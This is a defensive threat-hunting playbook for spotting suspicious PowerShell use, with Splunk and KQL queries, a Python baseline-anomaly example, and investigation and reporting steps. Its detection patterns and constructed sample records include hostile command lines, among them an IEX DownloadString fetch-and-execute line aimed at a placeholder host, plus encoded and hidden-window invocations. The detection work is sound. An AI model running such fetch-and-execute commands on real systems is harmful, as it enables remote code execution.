# Detailed Hunting Workflow - Detecting Suspicious PowerShell Execution

## Phase 1: Data Collection and Querying

### Splunk SPL Query

```spl
index=sysmon EventCode=1 Image="*\\powershell.exe"
| where match(CommandLine, "(?i)(-enc|-encodedcommand|-w hidden|-nop|iex|invoke-expression|downloadstring|webclient|bypass)")
| table _time Computer User CommandLine ParentImage
```

### KQL Query (Microsoft Defender for Endpoint)

```kql
DeviceProcessEvents
| where FileName =~ "powershell.exe"
| where ProcessCommandLine has_any ("-enc","-encodedcommand","-w hidden","iex","downloadstring","bypass")
| project Timestamp, DeviceName, AccountName, ProcessCommandLine, InitiatingProcessFileName
```

## Phase 2: Baseline and Anomaly Detection

### Step 2.1 - Establish Normal Behavior Baseline

- Collect 30 days of historical data for the targeted technique
- Document expected patterns, frequencies, and legitimate use cases
- Identify known false positive sources and document exceptions
- Build a statistical baseline (mean, standard deviation) for key metrics

### Step 2.2 - Identify Anomalies

- Compare current activity against the 30-day baseline
- Flag events exceeding 3 standard deviations from normal
- Prioritize anomalies by risk score and potential business impact
- Cross-reference with threat intelligence for known IOCs

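The following is an added example, not code from this repository: it applies the Phase 1 command-line indicator match to Sysmon-style process records and then runs the Phase 2 check (daily hit counts against a 30-day mean plus three standard deviations). The image path, command lines, and history series are constructed sample values.

```python
import re
import statistics
from collections import Counter

# The same indicator list the SPL query above matches, case-insensitive.
SUSPICIOUS = re.compile(
    r"(?i)(-enc|-encodedcommand|-w hidden|-nop|iex|invoke-expression|"
    r"downloadstring|webclient|bypass)"
)

# Constructed Sysmon Event ID 1 records: (day, Image, CommandLine). Not real telemetry.
IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [
    ("2024-01-30", IMAGE, "powershell.exe -File C:\\Scripts\\inventory.ps1"),     # benign
    ("2024-01-30", IMAGE, "powershell.exe -nop -w hidden -enc AAAAQQBC"),          # constructed
    ("2024-01-30", r"C:\Windows\System32\cmd.exe", "cmd.exe /c type notes.txt"),   # not powershell
    ("2024-01-31", IMAGE, "powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')"),
    ("2024-01-31", IMAGE, "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\deploy.ps1"),
    ("2024-01-31", IMAGE, "powershell.exe -EncodedCommand AAAAQQBC"),
    ("2024-01-31", IMAGE, "powershell.exe -w hidden -c Start-Sleep 1"),
    ("2024-01-31", IMAGE, "powershell.exe Invoke-Expression $env:X"),
]

# Constructed 30-day series of daily suspicious-hit counts (the key metric of Step 2.1).
HISTORY = [2, 3, 2, 1, 2, 3, 2, 2, 1, 3] * 3

def is_suspicious(image: str, command_line: str) -> bool:
    """Mirror the query's two filters: a powershell.exe image and an indicator in the command line."""
    return image.lower().endswith("\\powershell.exe") and SUSPICIOUS.search(command_line) is not None

def daily_hits(events) -> Counter:
    """Count suspicious executions per day; this is the series the baseline is built from."""
    return Counter(day for day, image, cmd in events if is_suspicious(image, cmd))

def baseline(history):
    """Mean and population standard deviation of the historical daily counts."""
    return statistics.mean(history), statistics.pstdev(history)

def anomalous_days(history, current: Counter) -> dict:
    """Return days whose count exceeds mean + 3 standard deviations (Step 2.2).
    If the baseline is flat (sd == 0) any count above the mean is flagged, which is
    why documented exceptions from Step 2.1 matter before acting on a hit."""
    mean, sd = baseline(history)
    threshold = mean + 3 * sd
    return {day: n for day, n in current.items() if n > threshold}

if __name__ == "__main__":
    print(anomalous_days(HISTORY, daily_hits(EVENTS)))  # → {'2024-01-31': 5}
```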

## Phase 3: Investigation and Correlation

### Step 3.1 - Deep Dive Analysis

- For each anomaly, collect full process tree context
- Correlate with network activity, file operations, and authentication events
- Check binary signatures, file hashes, and certificate validity
- Review user account context and access patterns

### Step 3.2 - Attack Chain Reconstruction

- Map findings to MITRE ATT&CK kill chain stages
- Identify the initial access vector if applicable
- Trace lateral movement and privilege escalation paths
- Determine data access and potential exfiltration

## Phase 4: Validation and Response

### Step 4.1 - True/False Positive Determination

- Verify findings with system owners and IT operations
- Check change management records for authorized activities
- Validate user context (authorized actions vs. compromised account)
- Document the determination rationale for each finding

### Step 4.2 - Response Actions

- For confirmed threats: initiate incident response procedures
- For detection gaps: create or update detection rules
- For false positives: tune existing rules and update exclusions
- Update the threat hunting playbook with lessons learned

## Phase 5: Documentation and Reporting

### Step 5.1 - Hunt Report

- Summarize hypothesis, methodology, and findings
- Include all queries executed and their results
- Document IOCs discovered and detection rules created
- Provide recommendations for security improvements

### Step 5.2 - Knowledge Base Update

- Add findings to the threat intelligence platform
- Update the MITRE ATT&CK coverage heatmap
- Share detection rules in Sigma format
- Schedule follow-up hunts for related techniques